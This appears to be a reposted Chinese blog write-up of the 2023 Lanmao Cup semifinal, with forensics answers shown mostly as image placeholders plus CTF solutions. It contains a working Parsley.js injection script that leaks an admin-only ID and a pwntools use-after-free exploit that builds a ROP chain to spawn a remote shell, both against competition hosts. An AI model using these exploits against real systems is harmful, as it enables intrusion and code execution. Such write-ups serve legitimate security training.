2023蓝帽杯半决赛电子取证+CTF部分题解

这篇具有很好参考价值的文章主要介绍了2023蓝帽杯半决赛电子取证+CTF部分题解。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

电子取证

1

2023蓝帽杯半决赛电子取证+CTF部分题解,比赛题解,网络安全

2

2023蓝帽杯半决赛电子取证+CTF部分题解,比赛题解,网络安全

3

2023蓝帽杯半决赛电子取证+CTF部分题解,比赛题解,网络安全

4

2023蓝帽杯半决赛电子取证+CTF部分题解,比赛题解,网络安全

5

2023蓝帽杯半决赛电子取证+CTF部分题解,比赛题解,网络安全

6

2023蓝帽杯半决赛电子取证+CTF部分题解,比赛题解,网络安全

7

2023蓝帽杯半决赛电子取证+CTF部分题解,比赛题解,网络安全

8

2023蓝帽杯半决赛电子取证+CTF部分题解,比赛题解,网络安全

9

2023蓝帽杯半决赛电子取证+CTF部分题解,比赛题解,网络安全

10

2023蓝帽杯半决赛电子取证+CTF部分题解,比赛题解,网络安全

11

2023蓝帽杯半决赛电子取证+CTF部分题解,比赛题解,网络安全

12

2023蓝帽杯半决赛电子取证+CTF部分题解,比赛题解,网络安全

13

2023蓝帽杯半决赛电子取证+CTF部分题解,比赛题解,网络安全

2023蓝帽杯半决赛电子取证+CTF部分题解,比赛题解,网络安全

2023蓝帽杯半决赛电子取证+CTF部分题解,比赛题解,网络安全

14

2023蓝帽杯半决赛电子取证+CTF部分题解,比赛题解,网络安全

15

2023蓝帽杯半决赛电子取证+CTF部分题解,比赛题解,网络安全

CTF

Web | MyLinuxBot

2023蓝帽杯半决赛电子取证+CTF部分题解,比赛题解,网络安全

Web | AirticleShare

import requests
import time

s = requests.Session()

base_url = "http://112.74.185.213:46799/"

res = s.get(base_url)

pos = res.text.find('name="c" value="') + len('name="c" value="')
csrftoken = res.text[pos:pos+16]

ss = "1234567890abcdef"
flag = ""

for i in range(16):
    for j in ss:
        payload = f"<form data-parsley-validate><input type=\"text\"data-parsley-trigger=\"focusout\"data-parsley-equalto='a[href^=\"/lookup.php?id={flag + j}\"]'data-parsley-errors-container=\"form[action='/like.php']\"data-parsley-error-message='<input type=\"input\" name=\"id\" value=\"0000000000000000\">'value='a[href^=\"/lookup.php?id={flag + j}\"]'autofocus><input type=\"submit\"></form>"
        data = {'c': csrftoken, 'content': payload}
        res = s.post(base_url + "add.php", data=data, allow_redirects=False)
        # print(res.headers)
        location = res.headers['Location']
        pos = location.find('id=') + 3
        wp = location[pos:]
        data = {'c': csrftoken, 'id': wp}
        res = s.post(base_url + "admin.php", data=data)
        time.sleep(6)

        res = s.get(f"http://112.74.185.213:46799/lookup.php?id={wp}")
        print(res.text)
        txt = res.text.replace("\n", "").replace("\r", "")
        if "Liked by</h3>admin"  not in txt:
            flag += j
            print(i,flag)
            break

Crypto | ezrsa

import gmpy2
from Crypto.Util.number import *
from sympy import symbols, solve

n = 161010103536746712075112156042553283066813155993777943981946663919051986586388748662616958741697621238654724628406094469789970509959159343108847331259823125490271091357244742345403096394500947202321339572876147277506789731024810289354756781901338337411136794489136638411531539112369520980466458615878975406339
x = 153801856029563198525204130558738800846256680799373350925981555360388985602786501362501554433635610131437376183630577217917787342621398264625389914280509
y = 8086061902465799210233863613232941060876437002894022994953293934963170056653232109405937694010696299303888742108631749969054117542816358078039478109426

p = symbols('p')

equation = p*(p+1+x+2*y) - n

# 解方程
solution = solve(equation, p)

print("p=", solution[1])
# 算q
n = 161010103536746712075112156042553283066813155993777943981946663919051986586388748662616958741697621238654724628406094469789970509959159343108847331259823125490271091357244742345403096394500947202321339572876147277506789731024810289354756781901338337411136794489136638411531539112369520980466458615878975406339
p = 12604273285023995463340817959574344558787108098986028639834181397979984443923512555395852711753996829630650627741178073792454428457548575860120924352450409
q = n // p

print("q=", q)

# 解rsa
n = 161010103536746712075112156042553283066813155993777943981946663919051986586388748662616958741697621238654724628406094469789970509959159343108847331259823125490271091357244742345403096394500947202321339572876147277506789731024810289354756781901338337411136794489136638411531539112369520980466458615878975406339
p = 12604273285023995463340817959574344558787108098986028639834181397979984443923512555395852711753996829630650627741178073792454428457548575860120924352450409
q = 12774247264858490260286489817359549241755117653791190036750069541210299769639605520977166141575653832360695781409025914510310324035255606840902393222949771
c = 15380535750650959213679345560658190067564859611922563753882617419201718847747207949211621591882732604480600745000879508274349808435529637573773711729853565120321608048340424321537282281161623712479117497156437792084977778826238039385697230676340978078264209760724043776058017336241110097549146883806481148999

assert p * q == n

h = (p - 1) * (q - 1)
e = 0x10001
d = gmpy2.invert(e, h)

flag = long_to_bytes(pow(c, d, n))
print("flag=", flag)

Pwn | Admin

非预期
2023蓝帽杯半决赛电子取证+CTF部分题解,比赛题解,网络安全

Pwn | uaf

from pwn import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])
io=remote("120.78.172.238",42564)
elf=ELF("./main")
libc=ELF("./libc-2.31.so")

def add(s,cc):
    io.sendlineafter(b">> ",b"1")
    io.sendlineafter(b"size: \n",str(s))
    io.sendafter(b"content: \n",cc)
    
def dele(n):
    io.sendlineafter(b">> ",b"2")
    io.sendlineafter(b"index: \n",str(n))
    
def edit(n,cc):
    io.sendlineafter(b">> ",b"3")
    io.sendlineafter(b"index: \n",str(n))
    io.sendafter(b"content: \n",cc)

def admin():
    io.sendlineafter(b">> ",b"5")
    io.sendafter(b"Passwd: \n",b"1234567890")
    
def show():
    io.sendlineafter(b">> ",b"4")
    
for i in range(8):
    add(0x240,b"aaaa")
    
add(0x80,b"bbb") #8

for i in range(8):
      dele(i)

show()

io.recvuntil(b"1. ")
heap=u64(io.recv(6).ljust(8,b"\x00"))-0x2a0
print("heap: ",hex(heap))

leak=u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))-0x1ebbe0
print("leak: ",hex(leak))

main=leak+0x26fc0
pop_rdi=leak+0x26b72
ret=leak+0x25679
sys=leak+libc.sym[b"system"]
str_sh=leak+next(libc.search(b"/bin/sh"))
free_hook=leak+libc.sym[b"__free_hook"]

add(0x240,b"\x00"*0x218+p64(ret)+p64(pop_rdi)+p64(str_sh)+p64(sys))

io.interactive()

misc|排排坐吃吃果果

先将data.xlsx中到的每一列都按照大小排序
之后将加粗的字体的背景颜色改为黑色
2023蓝帽杯半决赛电子取证+CTF部分题解,比赛题解,网络安全文章来源地址https://www.toymoban.com/news/detail-729172.html

到了这里,关于2023蓝帽杯半决赛电子取证+CTF部分题解的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 2023年 首届盘古石杯全国电子数据取证大赛 技能赛决赛 服务器题解析

    root@P@88w0rd 方法1 john的电脑使用账号john密码paofen登录,chrome浏览器中密码管理器内查看 切记仿真时不要清空账号密码 方法2 使用计算机取证软件解析john的电脑的镜像浏览器记录密码 TrueNAS-13.0-U4 使用虚拟机内TrueNAS显示的IP地址用浏览器访问后使用账号root 密码P@88w0rd 登陆后在

    2024年02月11日
    浏览(44)
  • [第七届蓝帽杯全国大学生网络安全技能大赛 蓝帽杯 2023]——Web方向部分题 详细Writeup

    你真的熟悉PHP吗? 源码如下 首先要先解决传参 my_secret.flag 根据php解析特性,如果字符串中存在 [、. 等符号,php会将其转换为 _ 且只转换一次 ,因此我们直接构造 my_secret.flag 的话,最后php执行的是 my_secret_flag ,因此我们将前面的 _ 用 [ 代替,也就是传参的时候传参为 my[s

    2024年02月10日
    浏览(45)
  • 从2023蓝帽杯0解题heapSpary入门堆喷

    堆喷射(Heap Spraying)是一种计算机安全攻击技术,它旨在在进程的堆中创建多个包含恶意负载的内存块。这种技术允许攻击者避免需要知道负载确切的内存地址,因为通过广泛地“喷射”堆,攻击者可以提高恶意负载被成功执行的机会。 这种技术尤其用于绕过地址空间布局

    2024年02月11日
    浏览(34)
  • 2023第七届蓝帽杯 初赛 web LovePHP

    直接给了源码。 network查看到,PHP版本是 7.4.33 题目要求我们GET一个 my_secret.flag 参数,根据PHP字符串解析特性,PHP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事: 删除空白符 将某些字符( [ 空格 + . )转换为下划线 实际应用: get传参NSS_JAY

    2024年02月10日
    浏览(36)
  • 2022蓝帽杯初赛

    gg币哈哈哈哈哈哈哈哈哈哈 第一次做取证。。 这题用到d盾。好吧d盾也是第一次用hhh 把下载的www文件拖进去,然后他就开始扫描了 打开第一个文件看看 lanmaobei666外包NSSCTF{} 要给密码先查看数据库配置文件/application/database.php  发现password是my_encrypt()函数的返回值。 追踪这个函

    2024年02月12日
    浏览(37)
  • [蓝帽杯 2022 初赛]domainhacker

    打开流量包,追踪TCP流,看到一串url编码    放到瑞士军刀里面解密  最下面这一串会觉得像base64编码  删掉前面两个字符就可以base64解码  依次类推,提取到第13个流,得到一串编码其中里面有密码  导出http对象   发现最后有个1.rar文件 不出所料被加密了,拿刚才解得密码

    2024年02月11日
    浏览(48)
  • 2023年第一届龙信杯电子数据取证竞赛(流量+服务器部分)

    分析“数据包1.cap”,请问客户端为什么访问不了服务器。( ) A.DDoS攻击 B.DoS攻击 C.SQL注入 D.文档攻击 DOS攻击,特征是短时间内TCP很高 分析“数据包1.cap”,出问题的服务器IP地址是_______。(格式:127.0.0.1) 跳过,之后分析 分析“数据包1.cap”,文件下发服务器的IP地址是

    2024年02月08日
    浏览(46)
  • 服务器部分 2023盘古石杯全国电子数据取证大赛 技能赛晋级赛

    MD5: FF4AB93F852B23DD759A6810754557A8 加密容器密码:usy1UN2Mmgram^d?0E5r9myrk!cmJGr 后期服务器应该会再更新一版,全部的题解不一定会更新,估计一年内会出吧,博主马上大四了,在各种考试。 取证软件未解析软路由物联网四块检材 仿真未检测到操作系统型号 将软路由四块检材同时选中

    2024年02月05日
    浏览(58)
  • 数字取证学习之内存取证CTF解题实例

    之前做了几道偏向取证的CTF题目,特此分享下,对于内存取证学习有一定的帮助 volatility2: 一款开源的内存取证框架工具,能够对导出的内存文件进行取证分析 Github开源地址:https://github.com/volatilityfoundation/volatility TA在KALI的低版本有自带 高版本移除了需要自己单独安装 安装

    2023年04月23日
    浏览(56)
  • CTF——杂项3.流量取证技术

    CTF比赛中,流量包的取证分析是另一项重要的考察方向。 通常比赛中会提供一个包含流量数据的PCAP文件,有时候也会需要选手们先进行修复或重构传输文件后,再进行分析。 总体把握 协议分级。 端点统计· 过滤筛选 过滤语法 Host,Protocol,contains,特征值· 发现异常 特殊字

    2024年02月01日
    浏览(48)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包